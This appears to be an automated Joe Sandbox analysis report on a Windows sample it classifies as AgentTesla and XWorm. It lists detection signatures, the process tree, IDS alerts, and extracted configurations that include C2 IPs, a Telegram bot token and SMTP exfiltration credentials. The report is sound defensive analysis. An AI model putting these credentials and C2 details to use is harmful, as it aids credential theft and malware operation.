Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ref#2056119.exe

Overview

General Information

Sample name:Ref#2056119.exe
Analysis ID:1562370
MD5:2c4db8b396dff48ba1e6ae44bd9aae08
SHA1:79319657ecfb6f4f7b13ab1e99df278a53b7d101
SHA256:be5ca82d327d53fc7eb8719289394cf37cc1f45d39429b8e527d600193b706e0
Tags:AgentTeslaexeuser-JAMESWT_MHT
Infos:

Detection

AgentTesla, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops VBS files to the startup folder
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Ref#2056119.exe (PID: 7496 cmdline: "C:\Users\user\Desktop\Ref#2056119.exe" MD5: 2C4DB8B396DFF48BA1E6AE44BD9AAE08)
    • Liphmahu.exe (PID: 7852 cmdline: "C:\Users\user\AppData\Local\Temp\Liphmahu.exe" MD5: 225F257617CD3A58DB6D4CCC447F48E9)
      • Liphmahu.exe (PID: 6104 cmdline: "C:\Users\user\AppData\Local\Temp\Liphmahu.exe" MD5: 225F257617CD3A58DB6D4CCC447F48E9)
        • WerFault.exe (PID: 4136 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6104 -s 932 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • Ref#2056119.exe (PID: 7912 cmdline: "C:\Users\user\Desktop\Ref#2056119.exe" MD5: 2C4DB8B396DFF48BA1E6AE44BD9AAE08)
  • wscript.exe (PID: 8168 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • ishon.exe (PID: 7236 cmdline: "C:\Users\user\AppData\Roaming\ishon.exe" MD5: 2C4DB8B396DFF48BA1E6AE44BD9AAE08)
      • ishon.exe (PID: 4588 cmdline: "C:\Users\user\AppData\Roaming\ishon.exe" MD5: 2C4DB8B396DFF48BA1E6AE44BD9AAE08)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm
{"C2 url": ["89.40.31.232"], "Port": 1717, "Aes key": "1717", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk", "Telegram Chatid": "793028759"}
{"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000007.00000002.2322238117.00000000043E9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000007.00000002.2322238117.00000000043E9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000005.00000002.3109582499.000000000041F000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000005.00000002.3109582499.000000000041F000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000005.00000002.3115674716.0000000002E54000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 41 entries
              SourceRuleDescriptionAuthorStrings
              4.2.Liphmahu.exe.6890000.8.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                8.2.Liphmahu.exe.400000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                  8.2.Liphmahu.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    8.2.Liphmahu.exe.400000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                    • 0x10bda:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                    • 0x10c77:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                    • 0x10d8c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                    • 0xfc48:$cnc4: POST / HTTP/1.1
                    4.2.Liphmahu.exe.25f81a0.0.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
                      Click to see the 21 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs" , ProcessId: 8168, ProcessName: wscript.exe
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 162.254.34.31, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Ref#2056119.exe, Initiated: true, ProcessId: 7912, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49743
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs" , ProcessId: 8168, ProcessName: wscript.exe

                      Data Obfuscation

                      barindex
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Ref#2056119.exe, ProcessId: 7496, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-25T14:47:21.747037+010020301711A Network Trojan was detected192.168.2.449757162.254.34.31587TCP
                      2024-11-25T14:49:22.543441+010020301711A Network Trojan was detected192.168.2.449743162.254.34.31587TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-25T14:47:46.266953+010028555421A Network Trojan was detected192.168.2.449743162.254.34.31587TCP
                      2024-11-25T14:48:13.004462+010028555421A Network Trojan was detected192.168.2.449757162.254.34.31587TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-25T14:47:46.266953+010028552451A Network Trojan was detected192.168.2.449743162.254.34.31587TCP
                      2024-11-25T14:48:13.004462+010028552451A Network Trojan was detected192.168.2.449757162.254.34.31587TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-25T14:47:21.747037+010028400321A Network Trojan was detected192.168.2.449757162.254.34.31587TCP
                      2024-11-25T14:49:22.543441+010028400321A Network Trojan was detected192.168.2.449743162.254.34.31587TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 00000008.00000002.3113434795.0000000002C21000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["89.40.31.232"], "Port": 1717, "Aes key": "1717", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk", "Telegram Chatid": "793028759"}
                      Source: 0.2.Ref#2056119.exe.3f8cd58.3.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}
                      Source: C:\Users\user\AppData\Roaming\ishon.exeReversingLabs: Detection: 36%
                      Source: Ref#2056119.exeReversingLabs: Detection: 36%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Roaming\ishon.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeJoe Sandbox ML: detected
                      Source: Ref#2056119.exeJoe Sandbox ML: detected
                      Source: 8.2.Liphmahu.exe.400000.0.unpackString decryptor: 89.40.31.232
                      Source: 8.2.Liphmahu.exe.400000.0.unpackString decryptor: 1717
                      Source: 8.2.Liphmahu.exe.400000.0.unpackString decryptor: <Xwormmm>
                      Source: 8.2.Liphmahu.exe.400000.0.unpackString decryptor: 28Nov2024
                      Source: 8.2.Liphmahu.exe.400000.0.unpackString decryptor: USB.exe
                      Source: Ref#2056119.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 172.67.129.178:443 -> 192.168.2.4:49737 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.129.178:443 -> 192.168.2.4:49739 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49740 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.129.178:443 -> 192.168.2.4:49747 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49750 version: TLS 1.2
                      Source: Ref#2056119.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: \??\C:\Windows\dll\System.pdbsR source: Liphmahu.exe, 00000008.00000002.3111190217.00000000010F8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: Liphmahu.exe, 00000008.00000002.3111190217.0000000001148000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ref#2056119.exe, 00000000.00000002.2047839333.0000000004082000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2058549679.0000000007440000.00000004.08000000.00040000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2047839333.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003855000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2322238117.0000000004360000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ref#2056119.exe, 00000000.00000002.2047839333.0000000004082000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2058549679.0000000007440000.00000004.08000000.00040000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2047839333.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003855000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2322238117.0000000004360000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: Ref#2056119.exe, 00000000.00000002.2047839333.000000000416B000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2055746024.0000000007280000.00000004.08000000.00040000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003705000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.pdb@RqN source: Liphmahu.exe, 00000008.00000002.3111190217.00000000010F8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: Ref#2056119.exe, 00000000.00000002.2047839333.000000000416B000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2055746024.0000000007280000.00000004.08000000.00040000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003705000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Temp\Liphmahu.PDB source: Liphmahu.exe, 00000008.00000002.3110023238.0000000000D37000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\System.pdb source: Liphmahu.exe, 00000008.00000002.3111190217.0000000001148000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: HP*n,C:\Windows\System.pdb source: Liphmahu.exe, 00000008.00000002.3110023238.0000000000D37000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\System.pdbM source: Liphmahu.exe, 00000008.00000002.3111190217.0000000001148000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: Liphmahu.exe, 00000008.00000002.3111190217.00000000010E2000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ##.pdb source: Liphmahu.exe, 00000008.00000002.3110023238.0000000000D37000.00000004.00000010.00020000.00000000.sdmp
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 4x nop then jmp 0715402Ch0_2_07153E12
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 4x nop then jmp 0715402Ch0_2_07153E20
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 4x nop then jmp 071536EFh0_2_07153690
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 4x nop then jmp 071536EFh0_2_07153682
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 4x nop then jmp 0715A448h0_2_0715A6EF
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 4x nop then jmp 0715A448h0_2_0715A505
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 4x nop then jmp 0715A448h0_2_0715A3B8
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 4x nop then jmp 0715A448h0_2_0715A3C8
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4x nop then jmp 05D8A7B5h4_2_05D8A490
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4x nop then jmp 05D8A7B5h4_2_05D8A480
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4x nop then jmp 05D8A7B5h4_2_05D8A84C
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4x nop then jmp 05D84475h4_2_05D84280
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4x nop then jmp 05D84475h4_2_05D84270
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then jmp 0748402Ch7_2_07483E12
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then jmp 0748402Ch7_2_07483E20
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then jmp 074836EFh7_2_07483682
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then jmp 074836EFh7_2_07483690
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then jmp 0748A448h7_2_0748A505
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then jmp 0748A448h7_2_0748A3C8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then jmp 0748A448h7_2_0748A3B8

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.4:49743 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49743 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.4:49757 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49757 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.4:49743 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.4:49743 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.4:49757 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.4:49757 -> 162.254.34.31:587
                      Source: Malware configuration extractorURLs: 89.40.31.232
                      Source: Yara matchFile source: 8.2.Liphmahu.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.Liphmahu.exe.25f81a0.0.raw.unpack, type: UNPACKEDPE
                      Source: global trafficTCP traffic: 192.168.2.4:49743 -> 162.254.34.31:587
                      Source: global trafficHTTP traffic detected: GET /fef4b8b5d2edef77f163d9b5ed69e2ea.vdf HTTP/1.1Host: cia.tfConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /417440cce6502c1c57308172e9826dec.mp4 HTTP/1.1Host: cia.tfConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /fef4b8b5d2edef77f163d9b5ed69e2ea.vdf HTTP/1.1Host: cia.tfConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                      Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                      Source: Joe Sandbox ViewIP Address: 162.254.34.31 162.254.34.31
                      Source: Joe Sandbox ViewASN Name: VIVIDHOSTINGUS VIVIDHOSTINGUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: global trafficTCP traffic: 192.168.2.4:49743 -> 162.254.34.31:587
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /fef4b8b5d2edef77f163d9b5ed69e2ea.vdf HTTP/1.1Host: cia.tfConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /417440cce6502c1c57308172e9826dec.mp4 HTTP/1.1Host: cia.tfConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /fef4b8b5d2edef77f163d9b5ed69e2ea.vdf HTTP/1.1Host: cia.tfConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: cia.tf
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: Ref#2056119.exe, ishon.exe.0.dr, Liphmahu.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                      Source: Ref#2056119.exe, 00000000.00000002.2030087377.0000000001102000.00000004.00000020.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2191181764.0000000000856000.00000004.00000020.00020000.00000000.sdmp, Ref#2056119.exe, 00000005.00000002.3110886704.00000000010D0000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2304145044.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 0000000C.00000002.3110706904.0000000001163000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 0000000C.00000002.3110706904.0000000001181000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: Ref#2056119.exe, 00000000.00000002.2030087377.0000000001102000.00000004.00000020.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2191181764.0000000000856000.00000004.00000020.00020000.00000000.sdmp, Ref#2056119.exe, 00000005.00000002.3110886704.00000000010D0000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2304145044.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 0000000C.00000002.3136475457.00000000068E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: Ref#2056119.exe, 00000000.00000002.2030087377.0000000001102000.00000004.00000020.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2191181764.0000000000856000.00000004.00000020.00020000.00000000.sdmp, Ref#2056119.exe, 00000005.00000002.3135918315.000000000555B000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2304145044.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 0000000C.00000002.3136475457.00000000068E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                      Source: Ref#2056119.exe, ishon.exe.0.dr, Liphmahu.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                      Source: Ref#2056119.exe, ishon.exe.0.dr, Liphmahu.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                      Source: Ref#2056119.exe, 00000000.00000002.2030087377.0000000001102000.00000004.00000020.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2191181764.0000000000856000.00000004.00000020.00020000.00000000.sdmp, Ref#2056119.exe, 00000005.00000002.3110886704.00000000010D0000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2304145044.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 0000000C.00000002.3110706904.0000000001163000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 0000000C.00000002.3110706904.000000000117E000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 0000000C.00000002.3110706904.0000000001181000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
